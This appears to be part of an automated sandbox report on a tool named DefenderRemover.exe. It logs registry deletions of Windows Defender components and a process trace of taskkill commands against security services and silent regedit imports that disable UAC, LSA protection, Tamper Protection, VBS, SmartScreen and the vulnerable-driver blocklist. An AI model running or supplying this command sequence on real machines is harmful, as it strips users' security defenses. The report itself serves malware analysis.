| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\1d75a031035819f | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\LowLevelHooksTimeout = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\Instance\InitPropertyBag | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E48B2549-D510-4A76-8A5F-FC126A6215F0}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E48B2549-D510-4A76-8A5F-FC126A6215F0} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\DefaultIcon | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{a3b3c46c-05d8-429b-bf66-87068b4ce563}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\ShellFolder | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\ImmutableMuiCache\Strings | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\MuiCache | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{01afc156-f2eb-4c1c-a722-8550417d396f}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{a3b3c46c-05d8-429b-bf66-87068b4ce563} | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\ImmutableMuiCache | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Extensions\ProgIDs\AppXb5yxv86nkhp530y0y50yxe69c1qwad1x | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{05F3561D-0358-4687-8ACD-A34D24C488DF} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{a3b3c46c-05d8-429b-bf66-87068b4ce563}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{a3b3c46c-05d8-429b-bf66-87068b4ce563} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.Defender | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{01afc156-f2eb-4c1c-a722-8550417d396f}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\ShellFolder | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\Instance\InitPropertyBag | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\Instance | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{01afc156-f2eb-4c1c-a722-8550417d396f} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\AppUserModelId\Microsoft.Windows.Defender | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{05F3561D-0358-4687-8ACD-A34D24C488DF}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\Instance | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\DefaultIcon | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E48B2549-D510-4A76-8A5F-FC126A6215F0}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{05F3561D-0358-4687-8ACD-A34D24C488DF} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{05F3561D-0358-4687-8ACD-A34D24C488DF}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\AppUserModelId\Windows.SystemToast.SecurityAndMaintenance | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{01afc156-f2eb-4c1c-a722-8550417d396f} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E48B2549-D510-4A76-8A5F-FC126A6215F0} | C:\Windows\regedit.exe | N/A |
Runs .reg file with regedit
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\DefenderRemover.exe
"C:\Users\Admin\AppData\Local\Temp\DefenderRemover.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c .\Script_Run.bat
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "explorer.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "CompatTelRunner.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "DWWIN.EXE"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "DeviceCensus.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "GameBarPresenceWriter.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "SecurityHealthHost.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "SecurityHealthService.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "SecurityHealthSystray.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "smartscreen.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill.exe /f /im "MsMpEng.exe"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Antivirus_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Antivirus_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Defender Anti-Phishing_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Defender Anti-Phishing_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender and Security Center Notifications.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Antivirus_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Defender Anti-Phishing_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender and Security Center Notifications.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender Policies.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Antivirus_d.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Defender Anti-Phishing_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender and Security Center Notifications.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender Policies.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable LSA Protection.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender and Security Center Notifications.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender Policies.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable LSA Protection.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Microsoft Vulnerabile Driver Blocklist.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Defender Policies.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable LSA Protection.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Microsoft Vulnerabile Driver Blocklist.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable SmartScreen.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable LSA Protection.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Microsoft Vulnerabile Driver Blocklist.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable SmartScreen.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable System Mitigations.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Microsoft Vulnerabile Driver Blocklist.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable SmartScreen.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable System Mitigations.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Tamper Protection.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable SmartScreen.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable System Mitigations.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Tamper Protection.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable UAC.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable System Mitigations.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable UAC.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Tamper Protection.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable VBS.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable Tamper Protection.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable UAC.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable VBS.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Exploit Guard_d.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable UAC.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable VBS.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Exploit Guard_d.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Disable VBS.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\LockDown Windows Defender Security Center.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Exploit Guard_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\LockDown Windows Defender Security Center.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Exploit Guard_d.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Mitigation of Fault Torelant Heap.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\LockDown Windows Defender Security Center.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Mitigation of Fault Torelant Heap.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\LockDown Windows Defender Security Center.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\No more Delay and Timeouts.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\No more Delay and Timeouts.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
PowerRun.exe regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Anti-Phishing Services.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Mitigation of Fault Torelant Heap.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\No more Delay and Timeouts.reg"
C:\Windows\regedit.exe
"C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Mitigation of Fault Torelant Heap.reg"
C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe
"C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe" regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\Remover\REGS\Removal of Anti-Phishing Services.reg"
C:\Windows\regedit.exe
